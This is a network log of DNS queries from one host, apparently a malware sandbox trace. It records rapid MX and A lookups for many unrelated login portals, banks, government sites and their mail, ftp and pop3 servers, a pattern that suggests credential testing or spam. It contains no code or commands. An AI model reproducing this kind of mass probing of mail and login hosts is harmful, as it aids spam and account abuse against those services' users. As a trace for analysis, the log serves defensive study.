                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.155185938 CET192.168.2.61.1.1.10x8ef0Standard query (0)service.uan.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.156346083 CET192.168.2.61.1.1.10x9917Standard query (0)mobile.liga365gacor.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.156965017 CET192.168.2.61.1.1.10x2142Standard query (0)loopex.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.157313108 CET192.168.2.61.1.1.10x7942Standard query (0)hartico.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.158951998 CET192.168.2.61.1.1.10x3565Standard query (0)login2.innova.puglia.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.159816980 CET192.168.2.61.1.1.10x5ef2Standard query (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.165004015 CET192.168.2.61.1.1.10x17b4Standard query (0)cjdropshipping.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340632915 CET192.168.2.61.1.1.10xc25eStandard query (0)srienlinea.sri.gob.ecMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340914965 CET192.168.2.61.1.1.10x58e2Standard query (0)ucv.blackboard.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.340998888 CET192.168.2.61.1.1.10x8df0Standard query (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341166973 CET192.168.2.61.1.1.10xcb6bStandard query (0)th-th.facebook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341257095 CET192.168.2.61.1.1.10x25f7Standard query (0)www2.personas.santander.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.341491938 CET192.168.2.61.1.1.10x7231Standard query (0)cloud.simplify3d.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.528419018 CET192.168.2.61.1.1.10x678dStandard query (0)s163-es.ogame.gameforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.529937029 CET192.168.2.61.1.1.10x15a1Standard query (0)oferta.senasofiaplus.edu.coMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.535510063 CET192.168.2.61.1.1.10x5320Standard query (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.535510063 CET192.168.2.61.1.1.10x51f3Standard query (0)easygold.joyalukkas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.536309004 CET192.168.2.61.1.1.10x9543Standard query (0)ov.edesur.com.doMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.536309004 CET192.168.2.61.1.1.10x82beStandard query (0)etd.lib.tuke.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.542638063 CET192.168.2.61.1.1.10xb22bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.542896986 CET192.168.2.61.1.1.10xef85Standard query (0)accounts.ecitizen.go.keA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543354034 CET192.168.2.61.1.1.10xd8eeStandard query (0)mitextoescolar.mineduc.clMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543354034 CET192.168.2.61.1.1.10x444aStandard query (0)ngoalongvn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543653965 CET192.168.2.61.1.1.10x482fStandard query (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.543718100 CET192.168.2.61.1.1.10xbf7eStandard query (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544301033 CET192.168.2.61.1.1.10x626cStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544301033 CET192.168.2.61.1.1.10x83c3Standard query (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544547081 CET192.168.2.61.1.1.10x6bd5Standard query (0)mitextoescolar.mineduc.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.544673920 CET192.168.2.61.1.1.10xd3a0Standard query (0)us-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.550899982 CET192.168.2.61.1.1.10x3bcdStandard query (0)app.plex.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.550899982 CET192.168.2.61.1.1.10x3eecStandard query (0)nossoplayer.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.553281069 CET192.168.2.61.1.1.10x2ac9Standard query (0)m.sellercenter.lazada.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.553281069 CET192.168.2.61.1.1.10xfa74Standard query (0)netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.567161083 CET192.168.2.61.1.1.10xd7d5Standard query (0)followerstiktok.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.567624092 CET192.168.2.61.1.1.10x968eStandard query (0)pl-pl.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.622559071 CET192.168.2.61.1.1.10x15a0Standard query (0)sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.622926950 CET192.168.2.61.1.1.10xe1b5Standard query (0)aeaaamorim.inovarmais.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xb6dbStandard query (0)auth.riotgames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xe83aStandard query (0)zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.626209021 CET192.168.2.61.1.1.10xa4e3Standard query (0)pan.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627357960 CET192.168.2.61.1.1.10xdc16Standard query (0)foros.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627592087 CET192.168.2.61.1.1.10xdaa4Standard query (0)api.cmrsanmartin.ziz.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.627876997 CET192.168.2.61.1.1.10x9418Standard query (0)21dukes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.628273010 CET192.168.2.61.1.1.10x3cf3Standard query (0)web.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.628763914 CET192.168.2.61.1.1.10xccc9Standard query (0)app.jobpet.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x131dStandard query (0)kamgarsetu.mp.gov.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x1fe1Standard query (0)mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631333113 CET192.168.2.61.1.1.10x880eStandard query (0)connect.appen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.631900072 CET192.168.2.61.1.1.10xbe2eStandard query (0)uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632419109 CET192.168.2.61.1.1.10x6aedStandard query (0)iam.gov.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632677078 CET192.168.2.61.1.1.10x69f3Standard query (0)hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632982016 CET192.168.2.61.1.1.10xcbe5Standard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.634778976 CET192.168.2.61.1.1.10x8114Standard query (0)accounts.snapchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.634779930 CET192.168.2.61.1.1.10xfb46Standard query (0)tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.635792017 CET192.168.2.61.1.1.10x242Standard query (0)instructory.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.635792017 CET192.168.2.61.1.1.10x4e2eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636231899 CET192.168.2.61.1.1.10x99b8Standard query (0)etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636368990 CET192.168.2.61.1.1.10x1f2bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10xa88dStandard query (0)casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10xf26cStandard query (0)transaccional.saludtotal.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.636990070 CET192.168.2.61.1.1.10x2427Standard query (0)srienlinea.sri.gob.ecA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637382984 CET192.168.2.61.1.1.10x736fStandard query (0)accounts.binance.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637761116 CET192.168.2.61.1.1.10xbcc0Standard query (0)mojadovera.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.637868881 CET192.168.2.61.1.1.10x9e86Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638250113 CET192.168.2.61.1.1.10xf409Standard query (0)brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xda7aStandard query (0)ngoalongvn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xb755Standard query (0)pt.secure.imvu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638549089 CET192.168.2.61.1.1.10xf381Standard query (0)phonandroid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638919115 CET192.168.2.61.1.1.10x8981Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.638919115 CET192.168.2.61.1.1.10xddf5Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998661041 CET192.168.2.61.1.1.10x1f2bStandard query (0)xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.998661041 CET192.168.2.61.1.1.10x736fStandard query (0)accounts.binance.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000325918 CET192.168.2.61.1.1.10x69f3Standard query (0)hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10x6aedStandard query (0)iam.gov.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10x4a2bStandard query (0)zuhauseplus.vodafone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.000519991 CET192.168.2.61.1.1.10xf409Standard query (0)brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001163960 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001164913 CET192.168.2.61.1.1.10x348fStandard query (0)netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001208067 CET192.168.2.61.1.1.10x4e2eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10x8114Standard query (0)accounts.snapchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10xbe2eStandard query (0)uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001357079 CET192.168.2.61.1.1.10xcbe5Standard query (0)ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10x1fe1Standard query (0)mw.redsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10x4e92Standard query (0)kwyk.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001434088 CET192.168.2.61.1.1.10xbd75Standard query (0)ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001619101 CET192.168.2.61.1.1.10x8981Standard query (0)hi-in.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.001619101 CET192.168.2.61.1.1.10x242Standard query (0)instructory.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.007985115 CET192.168.2.61.1.1.10x9e86Standard query (0)auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.036355972 CET192.168.2.61.1.1.10x425fStandard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.041461945 CET192.168.2.61.1.1.10xbd9eStandard query (0)ssc.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.042113066 CET192.168.2.61.1.1.10x5f38Standard query (0)ucv.blackboard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.043030977 CET192.168.2.61.1.1.10x2537Standard query (0)v.xsanime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.044385910 CET192.168.2.61.1.1.10x2ad6Standard query (0)academico.um.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.044796944 CET192.168.2.61.1.1.10xca7aStandard query (0)login2.innova.puglia.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.046664953 CET192.168.2.61.1.1.10x1597Standard query (0)easygold.joyalukkas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.059272051 CET192.168.2.61.1.1.10x1973Standard query (0)virtuadopt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.059602022 CET192.168.2.61.1.1.10x66b9Standard query (0)s163-es.ogame.gameforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.315401077 CET192.168.2.61.1.1.10xf683Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.354758024 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.367523909 CET192.168.2.61.1.1.10xba4bStandard query (0)cjdropshipping.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.418668032 CET192.168.2.61.1.1.10x88c1Standard query (0)account.mojang.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419008970 CET192.168.2.61.1.1.10xae6fStandard query (0)gitam.zoom.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419415951 CET192.168.2.61.1.1.10x7653Standard query (0)pxndx-mcr.boletia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419452906 CET192.168.2.61.1.1.10xca7aStandard query (0)login2.innova.puglia.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.419473886 CET192.168.2.61.1.1.10xbd9eStandard query (0)ssc.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.423913956 CET192.168.2.61.1.1.10xeefaStandard query (0)mx-1.cloudevelops.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.425228119 CET192.168.2.61.1.1.10x87dcStandard query (0)testconnect.garena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.432054043 CET192.168.2.61.1.1.10x2d44Standard query (0)oferta.senasofiaplus.edu.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.433928967 CET192.168.2.61.1.1.10x239dStandard query (0)analvids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.435918093 CET192.168.2.61.1.1.10x2a11Standard query (0)ov.edesur.com.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.436642885 CET192.168.2.61.1.1.10x5fbaStandard query (0)loopex.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.440608025 CET192.168.2.61.1.1.10x7370Standard query (0)mobile.liga365gacor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.455518007 CET192.168.2.61.1.1.10x11dbStandard query (0)alt2.gmr-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.524302959 CET192.168.2.61.1.1.10x7278Standard query (0)woomar.hostingas.ltA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.525835037 CET192.168.2.61.1.1.10x61bbStandard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.526510000 CET192.168.2.61.1.1.10x9482Standard query (0)mx.sistemas.pa.gov.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.528917074 CET192.168.2.61.1.1.10x2034Standard query (0)mx156.hostedmxserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.530006886 CET192.168.2.61.1.1.10xad1aStandard query (0)mail.zarkana2.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.530560970 CET192.168.2.61.1.1.10xa66Standard query (0)mxa.mailgun.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.531322956 CET192.168.2.61.1.1.10xa198Standard query (0)mail.nossoplayer.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.531833887 CET192.168.2.61.1.1.10x5b5Standard query (0)mxdomain.qq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.532459974 CET192.168.2.61.1.1.10xcb7fStandard query (0)mx3.name.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.534195900 CET192.168.2.61.1.1.10xfe39Standard query (0)mail2.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.534595013 CET192.168.2.61.1.1.10x785bStandard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.535903931 CET192.168.2.61.1.1.10xe7e4Standard query (0)mailgw.nic.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.537056923 CET192.168.2.61.1.1.10x2f2dStandard query (0)mx2.saudi.net.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.668570995 CET192.168.2.61.1.1.10x1b07Standard query (0)uh-is.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.718173027 CET192.168.2.61.1.1.10xf683Standard query (0)th-th.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.918133974 CET192.168.2.61.1.1.10x5739Standard query (0)hartico.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.920658112 CET192.168.2.61.1.1.10xd5fStandard query (0)www.hero-wars.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.118751049 CET192.168.2.61.1.1.10x2a9Standard query (0)www.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.123651028 CET192.168.2.61.1.1.10x302cStandard query (0)pop3.netizion.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.392611980 CET192.168.2.61.1.1.10xbc0Standard query (0)xsaniime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.400741100 CET192.168.2.61.1.1.10x4641Standard query (0)sii.ittlahuac.edu.mxMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.402108908 CET192.168.2.61.1.1.10xf292Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.467839003 CET192.168.2.61.1.1.10x2a9Standard query (0)www.uh.isA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.763125896 CET192.168.2.61.1.1.10x7c80Standard query (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.854192019 CET192.168.2.61.1.1.10xa1dbStandard query (0)ftp.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.879297972 CET192.168.2.61.1.1.10x14deStandard query (0)relay.signin.rockstargames.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.892299891 CET192.168.2.61.1.1.10x3ceeStandard query (0)pop3.casinocontroller.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.902431965 CET192.168.2.61.1.1.10xcb4dStandard query (0)ftp.brasilliker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.915160894 CET192.168.2.61.1.1.10x7408Standard query (0)ftp.ssl-es.hoteles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.915565968 CET192.168.2.61.1.1.10x473fStandard query (0)ftp.netcsomagom.dpd.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.936739922 CET192.168.2.61.1.1.10x2563Standard query (0)ftp.vidcorn.tvA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.954267025 CET192.168.2.61.1.1.10x7340Standard query (0)ftp.sii.itzacatepec.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.969651937 CET192.168.2.61.1.1.10xf0f8Standard query (0)pop.ventas.officeinsumos.com.arA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.986764908 CET192.168.2.61.1.1.10x3f8bStandard query (0)mail.tls21.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.019606113 CET192.168.2.61.1.1.10x15Standard query (0)sii.ittlahuac.edu.mxA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.056967020 CET192.168.2.61.1.1.10x39bbStandard query (0)ftp.signup2.br.leagueoflegends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.142451048 CET192.168.2.61.1.1.10x7c80Standard query (0)www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xf42eStandard query (0)ftp.auth.cambridgelms.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xe892Standard query (0)store.steampowered.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.203859091 CET192.168.2.61.1.1.10xa91dStandard query (0)mail.etd.lib.tuke.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xe940Standard query (0)ww12.chainmine.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xf2efStandard query (0)www.yellosa.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.204902887 CET192.168.2.61.1.1.10xbc6fStandard query (0)student.emis.gov.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.205940008 CET192.168.2.61.1.1.10xd738Standard query (0)www.phonandroid.comA (IP address)IN (0x0001)false
